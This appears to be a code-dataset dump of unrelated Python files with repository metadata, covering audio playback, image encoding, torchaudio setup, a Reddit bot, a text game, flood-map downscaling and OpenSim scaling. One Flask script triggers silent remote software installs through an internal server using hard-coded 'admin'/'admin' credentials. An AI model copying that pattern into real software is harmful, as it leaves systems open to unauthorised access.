| 32.042254 | 86 | 0.705934 | 514 | 4,550 | 6.095331 | 0.22179 | 0.103415 | 0.043409 | 0.053623 | 0.421002 | 0.313438 | 0.282796 | 0.23428 | 0.175551 | 0.175551 | 0 | 0.000265 | 0.171429 | 4,550 | 141 | 87 | 32.269504 | 0.830769 | 0.024176 | 0 | 0.22 | 0 | 0 | 0.122463 | 0 | 0 | 0 | 0 | 0.007092 | 0 | 1 | 0.08 | false | 0.01 | 0.07 | 0.08 | 0.89 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfaff810f8ad02f15def8943b57bf4630603e431 | 1,597 | py | Python | python_src/tbd_audio_common/sound_maker.py | CMU-TBD/tbd_audio_common | 5afdaccbf1e5c8ad038ce849844cd85e846b8927 | [
"MIT-CMU",
"MIT"
] | null | null | null | python_src/tbd_audio_common/sound_maker.py | CMU-TBD/tbd_audio_common | 5afdaccbf1e5c8ad038ce849844cd85e846b8927 | [
"MIT-CMU",
"MIT"
] | null | null | null | python_src/tbd_audio_common/sound_maker.py | CMU-TBD/tbd_audio_common | 5afdaccbf1e5c8ad038ce849844cd85e846b8927 | [
"MIT-CMU",
"MIT"
] | null | null | null | #!/usr/bin/env python
import rospy
import alloy.ros
import os
import wave
import actionlib
from tbd_ros_msgs.msg import (
playAudioAction,
playAudioGoal
)
class SoundMaker():
def __init__(self):
self._tbd_audio_client = actionlib.SimpleActionClient("playAudio", playAudioAction)
self._tbd_imported_playAudioGoal = playAudioGoal
self._tbd_audio_client.wait_for_server()
self._res_dir = alloy.ros.get_res_path('tbd_audio_common')
def play_beep(self, block=True):
#get the
waveFile = wave.open(os.path.join(self._res_dir,'beep.wav'))
num_of_frames = waveFile.getnframes() * waveFile.getsampwidth()
#generate goal
goal = playAudioGoal()
goal.soundFile = waveFile.readframes(num_of_frames)
goal.rate = int(waveFile.getframerate())
goal.size = num_of_frames
#send to the goal server
if block:
self._tbd_audio_client.send_goal_and_wait(goal)
else:
self._tbd_audio_client.send_goal(goal)
def wait(self, duration=None):
"""
Wait for the sound to finish. Note, sometimes the last few seconds of the speech will still be playing when it ends
Parameters
----------
duration : rospy.Duration
Ros's implementation of Duration
"""
if self._tbd_audio_client.gh:
if duration is not None:
result = self._tbd_audio_client.wait_for_result(duration)
else:
result = self._tbd_audio_client.wait_for_result()
| 29.574074 | 123 | 0.644333 | 195 | 1,597 | 4.994872 | 0.441026 | 0.057495 | 0.086242 | 0.129363 | 0.155031 | 0.155031 | 0.075975 | 0.075975 | 0 | 0 | 0 | 0 | 0.271133 | 1,597 | 53 | 124 | 30.132075 | 0.83677 | 0.166562 | 0 | 0.0625 | 0 | 0 | 0.026128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.21875 | 0 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb19827d57787b285507d6f0c699802654b2f05 | 1,474 | py | Python | webserver/ProjetoSS.py | jonnyff/Outliers_NASA-Space-Apps | 2713bad7df491e1c32ef2657f4e7e868c3e3777b | [
"Apache-2.0"
] | null | null | null | webserver/ProjetoSS.py | jonnyff/Outliers_NASA-Space-Apps | 2713bad7df491e1c32ef2657f4e7e868c3e3777b | [
"Apache-2.0"
] | null | null | null | webserver/ProjetoSS.py | jonnyff/Outliers_NASA-Space-Apps | 2713bad7df491e1c32ef2657f4e7e868c3e3777b | [
"Apache-2.0"
] | null | null | null | from flask import Flask, request, render_template
from flask import json
from requests.auth import HTTPBasicAuth
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
ipcliente = request.remote_addr
programa = request.form['programa']
cmdchrome = "C:\ChromeSetup.exe /silent /install"
cmdnotepad = "C:\\npp.6.9.2.Installer.exe /S"
comando = ""
programafonte = ""
if programa == "googlechrome":
comando = cmdchrome
programafonte = "C:\ChromeSetup.exe"
elif programa == "notepad":
comando = cmdnotepad
programafonte = "C:\\npp.6.9.2.Installer.exe"
mensagem = {
'flowUuid': '3864e244-3ff8-4553-a5b4-38d6e5689744',
'inputs': {
'programafonte':programafonte, 'ipcliente': ipcliente, 'comando': comando}
}
r = requests.post('http://10.88.0.122:8080/oo/rest/v2/executions/',
data=json.dumps(mensagem),
auth=HTTPBasicAuth('admin', 'admin'), headers={'Content-Type': 'application/json'})
print(r.text)
return render_template('index.html')
else:
return render_template('index.html')
if __name__ == "__main__":
#Adicionar o host do servidor que vai rodar e a porta. EXEMPLO: app.run(host='192.168.0.1', port='8080')
app.run(host="noruega.unit.br", port="80")
| 35.095238 | 109 | 0.591588 | 163 | 1,474 | 5.251534 | 0.588957 | 0.049065 | 0.035047 | 0.014019 | 0.11215 | 0.044393 | 0.044393 | 0 | 0 | 0 | 0 | 0.053456 | 0.263908 | 1,474 | 41 | 110 | 35.95122 | 0.735484 | 0.069878 | 0 | 0.060606 | 0 | 0 | 0.260584 | 0.065693 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.090909 | 0 | 0.181818 | 0.030303 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb4a6fbb8d580b5d2075aecbe9dbd0aeb08ff0b | 3,232 | py | Python | scripts/vramc/encoder.py | paulscottrobson/6502-basic | d4c360041bfa49427a506465e58bb0ef94beaa44 | [
"MIT"
] | 3 | 2021-09-30T19:34:11.000Z | 2021-10-31T06:55:50.000Z | scripts/vramc/encoder.py | paulscottrobson/6502-Basic | d4c360041bfa49427a506465e58bb0ef94beaa44 | [
"MIT"
] | null | null | null | scripts/vramc/encoder.py | paulscottrobson/6502-Basic | d4c360041bfa49427a506465e58bb0ef94beaa44 | [
"MIT"
] | 1 | 2021-12-07T21:58:44.000Z | 2021-12-07T21:58:44.000Z | # *****************************************************************************
# *****************************************************************************
#
# Name: encoder.py
# Author: Paul Robson (paul@robsons.org.uk)
# Date: 27th March 2021
# Purpose: Encode graphics
#
# *****************************************************************************
# *****************************************************************************
from palette import *
from PIL import Image
# *****************************************************************************
#
# Encode graphics object worker
#
# *****************************************************************************
class ImageEncoder(object):
def __init__(self):
pass
#
# Encode one image.
#
def encode(self,image,palette,is4Bit,reqWidth,reqHeight):
image = image.convert("RGBA")
#
# Does it need resizing ?
#
if image.width != reqWidth or image.height != reqHeight:
image = self.resizeImage(image,reqWidth,reqHeight)
#
# Scan & find nearest.
#
data = []
for y in range(0,reqHeight):
for x in range(0,reqWidth):
pixel = image.getpixel((x,y))
if pixel[3] > 64:
data.append(self.findBest(palette,is4Bit,pixel))
else:
data.append(0xF0 if is4Bit else 0x00)
#
# Display (optional)
#
if False:
for y in range(0,reqHeight):
p = y * reqWidth
print("".join(["${0:02x}".format(c) for c in data[p:p+reqWidth]]))
#
# Crunch if 4 bit
#
if is4Bit:
data = self.crunch(data)
return data
#
# Crunch 8 bit to 4 bit.
#
def crunch(self,inp):
output = []
while len(inp) != 0:
assert inp[0] >= 0xF0 and inp[0] <= 0xFF
assert inp[1] >= 0xF0 and inp[1] <= 0xFF
output.append(((inp[0] & 0xF) << 4) + (inp[1] & 0xF))
inp = inp[2:]
return output
#
# Find best pixel for given rgb value (0-255 range)
#
def findBest(self,palette,is4Bit,pixel):
r = palette.byteToNibble(pixel[0])
g = palette.byteToNibble(pixel[1])
b = palette.byteToNibble(pixel[2])
bestScore = None
bestPixel = None
for pix in range(241 if is4Bit else 1,256):
test = palette.get(pix)
rt = (test >> 8) & 0xF
gt = (test >> 4) & 0xF
bt = (test >> 0) & 0xF
diff = (r-rt)*(r-rt)+(b-bt)*(b-bt)+(g-gt)*(g-gt)
if bestScore is None or diff < bestScore:
bestScore = diff
bestPixel = pix
assert bestPixel is not None
return bestPixel
#
# Resize image maintaining aspect ratio
#
def resizeImage(self,img,w,h):
ws = w / img.width # Scales to fit in space
hs = h / img.height
scale = min(ws,hs) # Scale to use is the smaller.
xScaled = int(img.width*scale+0.5) # Work out scaled size.
yScaled = int(img.height*scale+0.5)
img = img.resize((xScaled,yScaled),resample = Image.BILINEAR) # Resize. Now fits in at least one axis
if img.width != w or img.height != h:
newImage = Image.new("RGBA",(w,h),0) # Centre on new image.
newImage.paste(img,(int(w/2-img.width/2),int(h/2-img.height/2)))
img = newImage
return img
if __name__ == "__main__":
palette = Palette()
palette.setSpritePalette()
#
image = Image.open("mario.png")
#
encoder = ImageEncoder()
enc = encoder.encode(image,palette,False,32,32)
| 28.350877 | 107 | 0.534963 | 411 | 3,232 | 4.177616 | 0.377129 | 0.016308 | 0.013978 | 0.012813 | 0.024461 | 0.024461 | 0 | 0 | 0 | 0 | 0 | 0.030385 | 0.195545 | 3,232 | 113 | 108 | 28.60177 | 0.63 | 0.299196 | 0 | 0.029851 | 0 | 0 | 0.014885 | 0 | 0 | 0 | 0.017591 | 0 | 0.044776 | 1 | 0.074627 | false | 0.014925 | 0.029851 | 0 | 0.179104 | 0.014925 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb5034780b879d1244f12e00e78645edb6abd45 | 2,541 | py | Python | torchaudio/__init__.py | micmelesse/audio | e8cc7f9130135e8ab96d58b0225d5120da6a0804 | [
"BSD-2-Clause"
] | null | null | null | torchaudio/__init__.py | micmelesse/audio | e8cc7f9130135e8ab96d58b0225d5120da6a0804 | [
"BSD-2-Clause"
] | 1 | 2021-08-31T22:20:32.000Z | 2021-08-31T22:20:32.000Z | torchaudio/__init__.py | micmelesse/audio | e8cc7f9130135e8ab96d58b0225d5120da6a0804 | [
"BSD-2-Clause"
] | null | null | null | from torchaudio._internal import module_utils as _mod_utils # noqa: F401
if _mod_utils.is_module_available('torchaudio._torchaudio'):
# Note this import has two purposes
# 1. Make _torchaudio accessible by the other modules (regular import)
# 2. Register torchaudio's custom ops bound via TorchScript
#
# For 2, normally function calls `torch.ops.load_library` and `torch.classes.load_library`
# are used. However, in our cases, this is inconvenient and unnecessary.
#
# - Why inconvenient?
# When torchaudio is deployed with `pex` format, all the files are deployed as a single zip
# file, and the extension module is not present as a file with full path. Therefore it is not
# possible to pass the path to library to `torch.[ops|classes].load_library` functions.
#
# - Why unnecessary?
# When torchaudio extension module (C++ module) is available, it is assumed that
# the extension contains both TorchScript-based binding and PyBind11-based binding.*
# Under this assumption, simply performing `from torchaudio import _torchaudio` will load the
# library which contains TorchScript-based binding as well, and the functions/classes bound
# via TorchScript become accessible under `torch.ops` and `torch.classes`.
#
# *Note that this holds true even when these two bindings are split into two library files and
# the library that contains PyBind11-based binding (`_torchaudio.so` in the following diagram)
# depends on the other one (`libtorchaudio.so`), because when the process tries to load
# `_torchaudio.so` it detects undefined symbols from `libtorchaudio.so` and will automatically
# loads `libtorchaudio.so`. (given that the library is found in a search path)
#
# [libtorchaudio.so] <- [_torchaudio.so]
#
#
from torchaudio import _torchaudio # noqa
else:
import warnings
warnings.warn('torchaudio C++ extension is not available.')
from torchaudio import (
compliance,
datasets,
functional,
models,
kaldi_io,
utils,
sox_effects,
transforms,
)
from torchaudio.backend import (
list_audio_backends,
get_audio_backend,
set_audio_backend,
)
try:
from .version import __version__, git_version # noqa: F401
except ImportError:
pass
__all__ = [
'compliance',
'datasets',
'functional',
'models',
'kaldi_io',
'utils',
'sox_effects',
'transforms',
'list_audio_backends',
'get_audio_backend',
'set_audio_backend',
]
| 35.291667 | 98 | 0.709957 | 326 | 2,541 | 5.40184 | 0.423313 | 0.03975 | 0.034072 | 0.034072 | 0.128336 | 0.128336 | 0.128336 | 0.128336 | 0.128336 | 0.074957 | 0 | 0.0065 | 0.212908 | 2,541 | 71 | 99 | 35.788732 | 0.874 | 0.610783 | 0 | 0 | 0 | 0 | 0.193312 | 0.022989 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.026316 | 0.184211 | 0 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb6340fbbc7e56129c9bfe9ba48fe36ac1730fd | 900 | py | Python | Aprendendo Python/cursopythonudamy/aula24_operadorternario.py | JlucasS777/Aprendendo-Python | a3a960260070f0d604c27fbbc41578a6ab11edb5 | [
"MIT"
] | null | null | null | Aprendendo Python/cursopythonudamy/aula24_operadorternario.py | JlucasS777/Aprendendo-Python | a3a960260070f0d604c27fbbc41578a6ab11edb5 | [
"MIT"
] | null | null | null | Aprendendo Python/cursopythonudamy/aula24_operadorternario.py | JlucasS777/Aprendendo-Python | a3a960260070f0d604c27fbbc41578a6ab11edb5 | [
"MIT"
] | null | null | null | # Operador Ternário
'''login_user = False
if login_user : # isso é o mesmo que if login_user == True:
msg = 'Usuário logado'
else:
msg = 'Usuário precisa logar'
print(msg)
print(i)'''
''' O código acima é o mesmo que :
'''
# login_user = False
# msg ='Usuário logado.'if login_user else ' Usuário precisa logar'
# print(msg)]
print('Seja bem-vindo ao programa sua idade , agora você vai saber se é adulto ou não \n '
'Para sair do program escolha uma idade maior que 120\n')
while True:
idade = input('Qual a sua idade :')
if not idade.isnumeric():
print( 'Você precisa digitar apenas números')
else:
idade=int(idade)
if idade > 120 :
print('Fim do programa')
break
if idade < 120 :
usario = 'Você é maior de idade'if idade >= 18 else 'Usuario menor de idade, vá brincar de durmir '
print(usario) | 30 | 111 | 0.628889 | 133 | 900 | 4.218045 | 0.496241 | 0.080214 | 0.058824 | 0.035651 | 0.114082 | 0.114082 | 0 | 0 | 0 | 0 | 0 | 0.016743 | 0.27 | 900 | 30 | 112 | 30 | 0.837139 | 0.314444 | 0 | 0 | 0 | 0 | 0.472855 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb69b8488c9035534337b7d04075f3c5e669cc8 | 471 | py | Python | images_of/entrypoints/bot.py | amici-ursi/ImagesOfNetwork | a8922c24b7e2b0df50282842ebb0998a3cb7d60a | [
"MIT"
] | 12 | 2016-04-23T23:24:44.000Z | 2018-09-17T04:07:56.000Z | images_of/entrypoints/bot.py | amici-ursi/ImagesOfNetwork | a8922c24b7e2b0df50282842ebb0998a3cb7d60a | [
"MIT"
] | 90 | 2016-04-10T06:12:23.000Z | 2017-07-24T14:15:38.000Z | images_of/entrypoints/bot.py | amici-ursi/ImagesOfNetwork | a8922c24b7e2b0df50282842ebb0998a3cb7d60a | [
"MIT"
] | 9 | 2016-04-24T21:30:21.000Z | 2020-06-15T13:45:12.000Z | import click
from images_of import command, settings, Reddit
from images_of.bot import Bot
@command
@click.option('--no-post', is_flag=True, help='Do not post to reddit.')
def main(no_post):
"""Reddit Network scraper and x-poster bot."""
r = Reddit('{} v6.0 /u/{}'.format(settings.NETWORK_NAME,
settings.USERNAME))
r.oauth()
b = Bot(r, should_post=not no_post)
b.run()
if __name__ == '__main__':
main()
| 22.428571 | 71 | 0.615711 | 67 | 471 | 4.104478 | 0.567164 | 0.065455 | 0.087273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005602 | 0.242038 | 471 | 20 | 72 | 23.55 | 0.764706 | 0.084926 | 0 | 0 | 0 | 0 | 0.122353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb6e0c1a847c2bc7fe17d92901369d447464178 | 4,740 | py | Python | server/architext/verbs/edit_world.py | JimenaAndrea/architext | fb49624f7301902a357815af0ca5d320cfc6ddb6 | [
"MIT"
] | 3 | 2020-08-02T07:14:25.000Z | 2021-04-25T12:22:53.000Z | server/architext/verbs/edit_world.py | JimenaAndrea/architext | fb49624f7301902a357815af0ca5d320cfc6ddb6 | [
"MIT"
] | 130 | 2020-07-15T12:09:30.000Z | 2021-05-27T15:02:01.000Z | server/architext/verbs/edit_world.py | JimenaAndrea/architext | fb49624f7301902a357815af0ca5d320cfc6ddb6 | [
"MIT"
] | 1 | 2021-06-10T15:51:49.000Z | 2021-06-10T15:51:49.000Z | from . import verb
import textwrap
from .. import entities
import architext.strings as strings
class EditWorld(verb.Verb):
command = _('editworld')
permissions = verb.CREATOR
def __init__(self, session):
super().__init__(session)
self.world = self.session.user.room.world_state.get_world()
self.option_number = None
self.current_process_function = self.process_first_message
def process(self, message):
if message == '/':
self.session.send_to_client(strings.cancelled)
self.finish_interaction()
else:
self.current_process_function(message)
def process_first_message(self, message):
title = _('Editing this world: "{world_name}"').format(world_name=self.world.name)
body = _(
'Enter the number of the value you want to edit.\n'
' 0 - Name\n'
' 1 - Make public/private\n'
' 2 - Edit freedom'
)
out_message = strings.format(title, body, cancel=True)
self.session.send_to_client(out_message)
self.current_process_function = self.process_option_number
def process_option_number(self, message):
try:
message = int(message)
except ValueError:
self.session.send_to_client(strings.not_a_number)
return
options = {
0: {
"out_message": _('Enter the new name:'),
"next_process_function": self.process_new_world_name,
},
1: {
"out_message": _(
'This world is {actual_value}.\n'
'Do you want to change it to {new_value}? [yes/no]'
).format(
actual_value=(strings.public if self.world.public else strings.private),
new_value=(strings.public if not self.world.public else strings.private)
),
"next_process_function": self.process_public_choice,
},
2: {
"out_message": _(
'Who should be able to edit the world?\n'
' 0 - All users.\n'
' 1 - Only you and your designated editors.'
),
"next_process_function": self.process_edit_freedom_option,
}
}
try:
chosen_option = options[message]
except KeyError:
self.session.send_to_client(strings.wrong_value)
return
self.session.send_to_client(chosen_option["out_message"])
self.current_process_function = chosen_option["next_process_function"]
def process_new_world_name(self, message):
if not message:
self.session.send_to_client(strings.is_empty)
return
world = self.session.user.room.world_state.get_world()
world.name = message
world.save()
self.finish_interaction()
self.session.send_to_client(_("The name has been successfully changed."))
return
def process_public_choice(self, message):
if message.lower() in strings.yes_input_options:
try:
self.world.toggle_public()
except entities.PublicWorldLimitReached:
self.session.send_to_client(_('You have reached the limit of public worlds in this server. Try to make another world private or ask the admin to increase your limit.'))
self.finish_interaction()
return
self.session.send_to_client(_('This world is now {public_or_private}.').format(public_or_private=(strings.public if self.world.public else strings.private)))
self.finish_interaction()
elif message.lower() in strings.no_input_options:
self.session.send_to_client(_('OK. The world remains {public_or_private}').format(public_or_private=(strings.public if self.world.public else strings.private)))
self.finish_interaction()
else:
self.session.send_to_client(_('Please enter "yes" or "no".'))
def process_edit_freedom_option(self, message):
if message == '0':
self.session.user.room.world_state.get_world().set_to_free_edition()
self.session.send_to_client(_("Everybody can edit this world now."))
self.finish_interaction()
elif message == '1':
self.session.user.room.world_state.get_world().set_to_privileged_edition()
self.session.send_to_client(_("Only your designated editors and you can edit this world now."))
self.finish_interaction()
else:
self.session.send_to_client(strings.wrong_value) | 41.217391 | 184 | 0.606962 | 549 | 4,740 | 4.978142 | 0.23133 | 0.076473 | 0.076839 | 0.087084 | 0.448225 | 0.362971 | 0.252836 | 0.225759 | 0.183315 | 0.107574 | 0 | 0.003014 | 0.3 | 4,740 | 115 | 185 | 41.217391 | 0.820675 | 0 | 0 | 0.235294 | 0 | 0.009804 | 0.182029 | 0.017718 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068627 | false | 0 | 0.039216 | 0 | 0.186275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb7c5fc2640cb5beb6e90cd007956cfc19c4d95 | 569 | py | Python | count_and_say.py | lutianming/leetcode | 848c7470ff5fd23608cc954be23732f60488ed8a | [
"MIT"
] | null | null | null | count_and_say.py | lutianming/leetcode | 848c7470ff5fd23608cc954be23732f60488ed8a | [
"MIT"
] | null | null | null | count_and_say.py | lutianming/leetcode | 848c7470ff5fd23608cc954be23732f60488ed8a | [
"MIT"
] | null | null | null | class Solution:
# @return a string
def countAndSay(self, n):
say = '1'
for i in range(n-1):
say = self._count_say(say)
return say
def _count_say(self, s):
curr = None
count = 0
say = ""
for c in s:
if c == curr:
count += 1
else:
if curr:
say += str(count)+str(curr)
curr = c
count = 1
say += str(count)+str(curr)
return say
s = Solution()
print(s.countAndSay(4))
| 21.884615 | 47 | 0.420035 | 68 | 569 | 3.455882 | 0.382353 | 0.034043 | 0.093617 | 0.119149 | 0.153191 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020134 | 0.476274 | 569 | 25 | 48 | 22.76 | 0.768456 | 0.02812 | 0 | 0.181818 | 0 | 0 | 0.001815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.227273 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb7d3cf4eee3e62630ca9d2b93475cfa95338cc | 2,510 | py | Python | src/1-prepare/cmftools/cmf_fldmap_downscale.py | DirkEilander/compound_hotspots | f9d7960633be80e8e24d2f2563df367cc3f060c6 | [
"BSD-3-Clause"
] | 1 | 2022-01-17T07:02:13.000Z | 2022-01-17T07:02:13.000Z | src/1-prepare/cmftools/cmf_fldmap_downscale.py | DirkEilander/compound_hotspots | f9d7960633be80e8e24d2f2563df367cc3f060c6 | [
"BSD-3-Clause"
] | null | null | null | src/1-prepare/cmftools/cmf_fldmap_downscale.py | DirkEilander/compound_hotspots | f9d7960633be80e8e24d2f2563df367cc3f060c6 | [
"BSD-3-Clause"
] | 1 | 2022-01-17T02:48:28.000Z | 2022-01-17T02:48:28.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import os
from os.path import join, dirname, realpath, basename
import rasterio
import click
import glob
import subprocess
import xarray as xr
import pandas as pd
from datetime import timedelta
from rasterio.transform import from_origin
@click.command()
@click.argument('ddir')
@click.argument('area')
@click.argument('time')
@click.option('-p', '--postfix', default='')
def downscale(ddir, area, time, postfix='', dt=-1):
# parse time
t = pd.to_datetime(time)
# read regions info
sdir = dirname(realpath(__file__))
fn_regions = join(sdir, 'map', 'hires', 'location.txt')
click.echo(fn_regions)
regions = pd.read_csv(fn_regions, delim_whitespace=True, index_col=0).T \
.set_index('area').astype(float).to_dict(orient='index')
# read nc
fn_nc = join(ddir, 'flddph*.nc')
ds = xr.open_mfdataset(fn_nc, chunks={'time': 10})
if dt != 0:
ds['time'] = ds.time.to_index() + timedelta(days=dt)
data = ds.flddph.sel(time=time).data
data = np.where(np.isnan(data), 1e+20, data) # mv = 1e20
# write to bin
datestr = '{:04d}{:02d}{:02d}'.format(t.year, t.month, t.day)
fn_out_bin = join(sdir, basename(fn_nc).replace('*.nc', datestr))
click.echo(fn_out_bin)
with open(fn_out_bin, 'w') as fid:
fid.write(data.astype('f4').tobytes())
# downscale
click.echo('downscaling...')
msg = ['./downscale_flddph', str(area), basename(fn_out_bin), '1']
click.echo(' '.join(msg))
subprocess.call(msg, cwd=sdir, stderr=subprocess.STDOUT)
# open binary output
fn_fld = join(sdir, '{:s}.flood'.format(area))
ny, nx = int(regions[area]['ny']), int(regions[area]['nx'])
with open(fn_fld, 'r') as fid:
data = np.fromfile(fid, 'f4').reshape(ny, nx)
# write to geotiff
fn_out_tif = join(ddir, basename(fn_out_bin) + postfix + '.tif')
click.echo('writing to ' + fn_out_tif)
west, north, csize = regions[area]['west'], regions[area]['north'], regions[area]['csize']
transform = from_origin(west, north, csize, csize)
with rasterio.open(fn_out_tif, 'w', driver='GTiff', height=data.shape[0],
compress='lzw', width=data.shape[1], count=1, dtype=str(data.dtype),
crs='+proj=latlong', transform=transform, nodata=-9999) as dst:
dst.write(data, 1)
# remove binary output
os.unlink(fn_out_bin)
os.unlink(fn_fld)
if __name__ == "__main__":
downscale()
| 33.918919 | 94 | 0.642231 | 366 | 2,510 | 4.26776 | 0.393443 | 0.028809 | 0.03073 | 0.020487 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014209 | 0.186853 | 2,510 | 73 | 95 | 34.383562 | 0.751102 | 0.067331 | 0 | 0 | 0 | 0 | 0.087983 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018519 | false | 0 | 0.203704 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb8ead9c6c7c310a5414613dd9bbb4a9dc0c78b | 5,083 | py | Python | scaling.py | samsalemi/OpenSim-Python-Simulation | f66bcce7aaaf3b4095d623b3ad2df484d123fa24 | [
"Apache-2.0"
] | 2 | 2021-11-01T20:21:23.000Z | 2021-11-26T03:14:25.000Z | scaling.py | samsalemi/OpenSim-Python-Simulation | f66bcce7aaaf3b4095d623b3ad2df484d123fa24 | [
"Apache-2.0"
] | null | null | null | scaling.py | samsalemi/OpenSim-Python-Simulation | f66bcce7aaaf3b4095d623b3ad2df484d123fa24 | [
"Apache-2.0"
] | null | null | null | # June 7 2018
# Author: Samuel Salemi
# University of Guelph Masters Graduate
# This script determines scaling factors and places them on model Gait2354
def scale():
import os
import opensim as osim
import shutil
import directories
# Global Directories
allDir = list(directories.main(directories))
parentDir = allDir[0]
paramsDir = allDir[1]
genericDir = allDir[2]
subID = allDir[4]
subResultsDir = allDir[5]
# Get generic Model
genericModel = "gait2354_LockedJoints.osim"
genericModelFile = genericDir + "/" + genericModel
if not os.path.exists(subResultsDir):
os.mkdir(subResultsDir)
# generic input XML files
scaleSetupFull = paramsDir + "/setupScale.xml"
markerSetFull = paramsDir + "/markerSet.xml"
# Make scale directory if non-existent
scaleResultsDir = subResultsDir + "/scale"
if os.path.exists(scaleResultsDir):
shutil.rmtree(scaleResultsDir, ignore_errors=True)
if not os.path.exists(scaleResultsDir):
os.mkdir(scaleResultsDir)
# Output XML Files
outputScaleFile = subID + "_scaleFactors.xml"
adjustedMarkerSet = subID + "_movedMarkers.xml"
# Output Model Files
outputModelFile = subID + ".osim"
# Input Data Files
dataFiles = parentDir + "/data/osDemo"
staticMarkerFile = "subject01_static.trc"
staticMarkerFull = dataFiles + "/" + staticMarkerFile
shutil.copy(staticMarkerFull, scaleResultsDir + "/" + staticMarkerFile)
# Output Data Files
staticCoordinates = subID + "_staticCoordinates.mot"
# Subject Measurements
subjectMass = 72.60000000
# Load Model
aModel = osim.Model(genericModelFile)
aModel.setName(subID)
# Initialize System
aModel.initSystem()
aState = aModel.initSystem()
# Add Marker Set
newMarkers = osim.MarkerSet(markerSetFull)
aModel.replaceMarkerSet(aState, newMarkers)
# Re-initialize State
aState = aModel.initSystem()
# Get Time Array for .trc file
markerData = osim.MarkerData(staticMarkerFull)
# Get Initial and Final Time
initial_time = markerData.getStartFrameTime()
final_time = markerData.getLastFrameTime()
# Create an array double and apply the time range
TimeArray = osim.ArrayDouble()
TimeArray.set(0, initial_time)
TimeArray.set(1, final_time)
# Scale Tool
scaleTool = osim.ScaleTool(scaleSetupFull)
scaleTool.setSubjectMass(subjectMass)
# GenericModelMaker-
# Tell scale tool to use the loaded model
scaleTool.getGenericModelMaker().setModelFileName(
genericDir + "/" + genericModel)
# # Set the Marker Set file (incase a markerset isnt attached to the model)
scaleTool.getGenericModelMaker().setMarkerSetFileName(markerSetFull)
# ModelScaler-
# Whether or not to use the model scaler during scale
scaleTool.getModelScaler().setApply(1)
# Set the marker file (.trc) to be used for scaling
scaleTool.getModelScaler().setMarkerFileName("/" + staticMarkerFile)
# set a time range
